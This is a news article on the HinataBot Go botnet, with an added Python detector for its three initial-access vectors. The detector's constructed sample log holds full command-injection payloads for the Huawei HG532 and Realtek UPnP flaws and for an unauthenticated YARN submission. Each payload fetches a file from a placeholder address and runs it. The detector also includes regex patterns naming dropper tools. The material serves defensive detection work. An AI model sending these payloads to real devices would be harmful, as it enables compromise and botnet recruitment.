New HinataBot botnet uses vulnerabilities in network equipment to carry out DDoS attacks


In a recent report, Akamai researchers described a new Go-based botnet called HinataBot. It compromises routers and servers through known vulnerabilities and then uses them to mount large-scale DDoS attacks.

The malware is distributed by exploiting exposed Hadoop YARN servers, a Realtek SDK vulnerability (CVE-2014-8361) and a Huawei HG532 router vulnerability (CVE-2017-17215). Both CVEs are command-injection flaws in the devices' UPnP services, and a YARN ResourceManager exposed without authentication lets anyone submit an application, which amounts to running a command on the cluster.
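As an added example (not from the Akamai report or this article), the following Python classifier flags request records that match the three initial-access vectors above. The ports, request paths and SOAP/JSON field names are assumptions taken from the publicly documented exploit traffic for each issue, the record format is a made-up honeypot/proxy JSON-lines layout, and the sample log lines are constructed for the example.

```python
import json
import re

# Shell syntax that has no business inside a UPnP SOAP field. Assumption:
# tuned to the busybox/wget/tftp droppers typical of router botnets.
SHELL_INJECTION = re.compile(r"\$\(|`|;\s*\S|/bin/busybox|\bwget\b|\bcurl\b|\btftp\b")

# Per-vector signatures. Ports, paths and field names are assumptions drawn
# from public exploit traffic for each issue, not from the article.
SIGNATURES = (
    {
        "name": "CVE-2017-17215 (Huawei HG532 UPnP DeviceUpgrade)",
        "port": 37215,
        "path": re.compile(r"^/ctrlt/DeviceUpgrade_1"),
        "field": re.compile(r"<New(StatusURL|DownloadURL)>", re.I),
    },
    {
        "name": "CVE-2014-8361 (Realtek SDK miniigd AddPortMapping)",
        "port": 52869,
        "path": re.compile(r"^/(picsdesc|wanipcn)\.xml$"),
        "field": re.compile(r"<NewInternalClient>", re.I),
    },
    {
        "name": "Exposed Hadoop YARN ResourceManager (unauthenticated app submission)",
        "port": 8088,
        "path": re.compile(r"^/ws/v1/cluster/apps(/new-application)?$"),
        "field": re.compile(r'"command"\s*:', re.I),
    },
)


def classify(rec):
    """Return the matching vector name for one request record, or None.

    rec is a dict with keys src, dst_port, method, path, body
    (constructed honeypot/proxy format used only for this example).
    """
    if rec.get("method", "").upper() != "POST":
        return None
    for sig in SIGNATURES:
        if rec.get("dst_port") != sig["port"] or not sig["path"].search(rec.get("path", "")):
            continue
        body = rec.get("body", "")
        # The two UPnP vectors are command injections: require both the
        # vulnerable field and shell syntax inside it, so a legitimate
        # AddPortMapping with a plain IP address is not flagged. For YARN,
        # any unauthenticated submission carrying a launch command counts.
        if sig["field"].search(body) and (sig["port"] == 8088 or SHELL_INJECTION.search(body)):
            return sig["name"]
        # new-application only reserves an ID; report it as a probe.
        if sig["port"] == 8088 and rec["path"].endswith("/new-application"):
            return sig["name"] + " probe"
    return None


def scan(lines):
    """Classify JSON-lines records; return a list of (src, vector) hits."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        name = classify(rec)
        if name:
            hits.append((rec["src"], name))
    return hits


# Constructed sample traffic (documentation-range IPs), not real captures.
SAMPLE_LOG = r'''
{"src":"198.51.100.7","dst_port":37215,"method":"POST","path":"/ctrlt/DeviceUpgrade_1","body":"<NewStatusURL>$(/bin/busybox wget -g 203.0.113.5 -l /tmp/x -r /x; sh /tmp/x)</NewStatusURL>"}
{"src":"198.51.100.8","dst_port":52869,"method":"POST","path":"/picsdesc.xml","body":"<NewInternalClient>`cd /tmp; wget http://203.0.113.5/x; sh x`</NewInternalClient>"}
{"src":"198.51.100.9","dst_port":8088,"method":"POST","path":"/ws/v1/cluster/apps/new-application","body":""}
{"src":"198.51.100.9","dst_port":8088,"method":"POST","path":"/ws/v1/cluster/apps","body":"{\"application-id\":\"application_1\",\"am-container-spec\":{\"commands\":{\"command\":\"wget http://203.0.113.5/x -O /tmp/x; sh /tmp/x\"}}}"}
{"src":"192.0.2.10","dst_port":8088,"method":"GET","path":"/ws/v1/cluster/info","body":""}
{"src":"192.0.2.11","dst_port":52869,"method":"POST","path":"/picsdesc.xml","body":"<NewInternalClient>192.168.1.20</NewInternalClient>"}
'''

if __name__ == "__main__":
    for src, vector in scan(SAMPLE_LOG.splitlines()):
        print(f"{src}\t{vector}")
```

The last two sample records are deliberate negatives: a read-only YARN query and a benign Realtek port mapping that carries the vulnerable field but no shell syntax. In practice the YARN check belongs on the ResourceManager's own access logs or a proxy in front of it, since the API is plain HTTP and the submission body is where the command lives.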

Old unpatched vulnerabilities and weak credentials are easy prey for attackers: they offer a documented entry point that requires no elaborate social engineering.

The operators behind HinataBot are believed to have been active since at least December 2022. They initially relied on Mirai-based malware and switched to code of their own design on January 11, 2023.

Since the initial discovery, Akamai researchers have found several newer HinataBot variants with more modular functionality and additional protective measures, a sign that the malware is still under active development.

Like other DDoS botnets, HinataBot contacts a C2 server for instructions and then launches attacks against the targeted IP addresses for a specified duration.

Early versions of the botnet supported HTTP, UDP, TCP and ICMP floods, but the latest iteration is limited to HTTP and UDP. Why the other two protocols were dropped is unknown; the authors may simply be experimenting.

Akamai researchers tested HinataBot's attack functions and extrapolated the results: in a real attack involving 10,000 bots, the UDP flood would exceed 3.3 terabits per second (Tbps), a powerful volumetric attack, while the HTTP flood would generate roughly 27 gigabits per second (Gbps). These figures are projections from lab measurements of the malware's throughput scaled to 10,000 nodes, so they indicate potential scale rather than an observed attack.

“Attackers used the Go language to take advantage of its high performance, ease of multithreading, multi-architecture support, and operating system cross-compilation, but also likely because Go complicates compilation and makes reverse engineering difficult,” Akamai said.